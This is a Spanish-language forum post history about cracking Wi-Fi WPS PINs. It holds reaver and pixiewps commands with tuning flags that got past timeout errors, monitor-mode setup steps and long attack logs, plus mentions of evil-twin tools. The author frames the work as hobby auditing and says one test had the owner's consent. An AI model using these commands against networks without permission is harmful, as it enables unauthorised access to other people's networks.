e_hash1 = 3fcfc03e8b40e3b4fe6054befd57f5de88302162d93d901d602b29258635f1c7
e_hash2 = 6305aa117903f8a570fe356724769ebfb6f844c5b2e70203b23ee568a3bd9263
authkey = 8ce4693f218bb6a98853e955fd71b35b2b24aa28c74499911221676672eb0768
e_nonce = 6fe34f8be48308418d5eb898cc71f28f
e_snonce1 = b2c21c840ddd3766025b5b4dcf99347a
e_snonce2 = 24df6b99fc751d5b5c138d52dff58b7b
wpa_psk = 5dCPU

running pixiewps --pke f3d3801bb8f7000174bb3f8ddcbc17ee5fe10ec5c3ad234329adb6bc7b978486a2ed20f95aa672641d51b9da7b5de8349ba33605f16cc48c543774edd3369ee4cc08e492c6ed0fe1f1c4b836bb9d03970189ff62ce2e3f381e8dfbf1859dafb51699ad51d503d8c377f2008c7e020977ef31583313da3e35b46777ff04605ffee50bffa2e3fd0686c1b7f8bd1ba5d945c7e4d28e2099664bb3620d66cced116bd85cfb7b1f46c97caee100f1e9706b6922bf19d8e742673061cbf6ad9e4e4484 --pkr 984acf84c1be94de3b3c89a1673557a49f6b72c93d09bbfbf1e9dc3c8ff260f3a50cdeaaf4701ccdf3df903222ccf9ed79e00183ef1e4a52e2d564f7a9260afef7a82e1f2435862185be5373d3ce1327a52588f8dd7961c76f6fd99574f21fca5e2d882ade54ffefe0f35d437dd8d65a9bcd9f0b6ccbbefa18b9ec892d45b365171750a1bcd9a04ced46f77db0a948529487ffdbaccf527f7626f9b990eec16b4fa826fee6bbc5aef70dfb9ab0824baafd767281f58c3623136ffa0c5a4533be --e-hash1 3fcfc03e8b40e3b4fe6054befd57f5de88302162d93d901d602b29258635f1c7 --e-hash2 6305aa117903f8a570fe356724769ebfb6f844c5b2e70203b23ee568a3bd9263 --authkey 8ce4693f218bb6a98853e955fd71b35b2b24aa28c74499911221676672eb0768 --e-nonce 6fe34f8be48308418d5eb898cc71f28f

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 6 s 719 ms

#18 Re: Wireless, Internet, Redes y Hacking » fluxion » 08-01-2018 23:28:15

No viene al caso, pero relacionado al evil twin, wifimosys me encanta comparado con fluxion.
Lástima que se me hace imposible portarlo a kali.

#19 Re: Preguntas generales y busqueda de nuevas brechas » Vulnerabilidad WPS PBC (Push button) » 27-12-2017 23:27:38

Sorry por bumpear ésto, pero lo vi en otro foro y ya lo estoy probando.
No tengo idea si aún funciona, pero no pierdo nada con intentarlo.

#20 Re: Preguntas generales y busqueda de nuevas brechas » Entendiendo los errores 0x0 en reaver... » 27-12-2017 01:03:12

No daba seguir el otro hilo, porque como ven, pude solucionarlo cuando ya me había dado por vencido.:D


@kcdtv ya me vi la help de bully, pero cuales son los argumentos para aumentar el delay y el timeout? No los capto del todo como para al menos darle una chance.
Sobre los errores que menciono boldeados y en colores son porque los sufrí hace unos días en casa de mi hermano, tuve que instalarle RAM y formatearle su windows así que aproveché para llevarme mi note y darle murra a su modem con su consentimiento jaja.
Es un Technicolor TG588, VDSL (según wash, chip broadcom).
Fue imposible mosquearlo por fuerza bruta con reaver.

Gracias a todos y feliz año! biere

#21 Preguntas generales y busqueda de nuevas brechas » Entendiendo los errores 0x0 en reaver... » 26-12-2017 12:31:28

troh
Respuestas: 4

Hola a todos! De nuevo vengo a que los maestros del area me tiren un poco de agua a ver si me despierto.:lol:

Resulta que al lanzar reaver en el 90% de los casos no puedo iniciar un ataque por fuerza bruta porque simplemente reaver entra en el bucle de éstos errores que menciono abajo (que encontré googleando)

[!] WPS transaction failed (code: 0x02), re-trying last pin - no hubo respuesta del router (timeout)
[!] WPS transaction failed (code: 0x03), re-trying last pin - paquetes en orden incorrecto y sin respuesta adecuada
[!] WPS transaction failed (code: 0x04), re-trying last pin - el router respondió que no quiere hablar con nosotros

Para que se den una idea, pude solucionar el testeo de un pin como en éste ejemplo:
https://www.wifi-libre.com/topic-955-te … html#p8335

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -T 7 -t 7 -vvv

Después de googlear un buen par de hs, encontré que añadiendo un par de argumentos extra pude corregir el problema y hacer que reaver trabaje como es debido.

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -T 7 -t 7 -d 5 -w -N -vv

Lo corrí dos veces, en la 1º obtuve la key en 5 segundos y en la 2º tomó 92 segundos.

Ahora, la pregunta del trillón es, como lidiar con éstos errores y no morir en el intento? Noté que el error 0x04 suele aparecer seguido en  WPS 2.0, o sea, los equipos más nuevos son los que menos "quieren hablar con nosotros"?
Entiendo que hay varios factores en juego, como la distancia al AP, router vulnerable o no, driver de la tarjeta USB que se use para auditar y otras variables que probablemente no tenga idea.
Para los que saben, se puede mejorar ésta siuación? Existen argumentos similares cuándo ejecutamos bully y nos encontramos con las mismas trabas?
En fin, si no les molesta, le dejo mis dudas a los maestros del foro.;)

Saludos y felices fiestas para todos!!

#22 Re: Preguntas generales y busqueda de nuevas brechas » Testeo de pin sin arrojar clave » 05-12-2017 00:40:50

Donde veo la salida de ralink? Ni cuenta me di.
Yo supongo que es una rtl8812au porque linux la detecta e instala así y hasta windows 10 la toma con ese driver.

Probé también con mis otras antenitas, una con chip rtl8187 y otra con ralink3070, mismo resultado.

#23 Re: Preguntas generales y busqueda de nuevas brechas » Testeo de pin sin arrojar clave » 04-12-2017 21:33:06

Gracias por responder.;)

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -T 7 -t 7 -vvv

Desafortunadamente, sigo en el mismo bucle (o puse mal el comando tongue). Y no aumenté la potencia ésta vez.

@kcdtv; cuando lanzo airmon-ng check kill mata los procesos dhclient y wpa_suplicant, después sigo con los otros como detallé más arriba.
Y sobre la tarjeta, también lo mencioné más arriba, no es una AWUS1900 sino una EDUP que me compré en ALI con chip rtl8812au.
http://www.szedup.com/product-item/ac-1 … b-adapter/

#24 Re: Preguntas generales y busqueda de nuevas brechas » Testeo de pin sin arrojar clave » 03-12-2017 23:21:22

La MAC original está editada, puse numeros al azar.
Sobre el wlan0 creí que dejé toda la info sobre el dispositivo USB que uso.
De hecho, sigo cada paso del git para hacerla funcionar:

# airmon-ng check kill
# ip l s wlan0 down
# iw dev wlan0 set type monitor
# ip l s wlan0 up
# iwconfig wlan0 txpower 30

#25 Re: Preguntas generales y busqueda de nuevas brechas » Testeo de pin sin arrojar clave » 03-12-2017 17:00:22

Dejo algunos datos extra, como el entorno de pruebas.
- Windows 10 Pro x 64
- VMWare Workstation 14.0.0
- Kali Linux 2017.3 x64
- EDUP usb wifi adapter 1200mbps 5ghz high gain wifi antenna 802.11ac long distance wifi receiver usb 3.0 wi-fi ethernet adapter (20 USD)
- Drivers instalados, desde el git que pusieron acá, post #19

https://www.wifi-libre.com/topic-808-error-compilando-drivers-awus1900-rtl8814au.html

- No usé airmon-ng, pongo la tarjeta en modo monitor usando iw dev

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -vvv 

Reaver v1.6.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0 to channel 9
[+] Waiting for beacon from 00:C0:CA:xx:xx:xx
[+] Received beacon from 00:C0:CA:xx:xx:xx
[+] Vendor: AtherosC
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 90.91% complete @ 2017-12-03 10:46:50 (0 seconds/pin)
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed

Esto pasó en los primeros minutos, después lo corté.

Pie de página

Información del usuario

Ultimo usuario registrado: Visiete
Usuarios registrados conectados: 0
Invitados conectados: 17

Estadisticas de los foros

Número total de usuarios registrados: 1,071
Número total de temas: 1,095
Número total de mensajes: 11,037

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21
Impulsado por FluxBB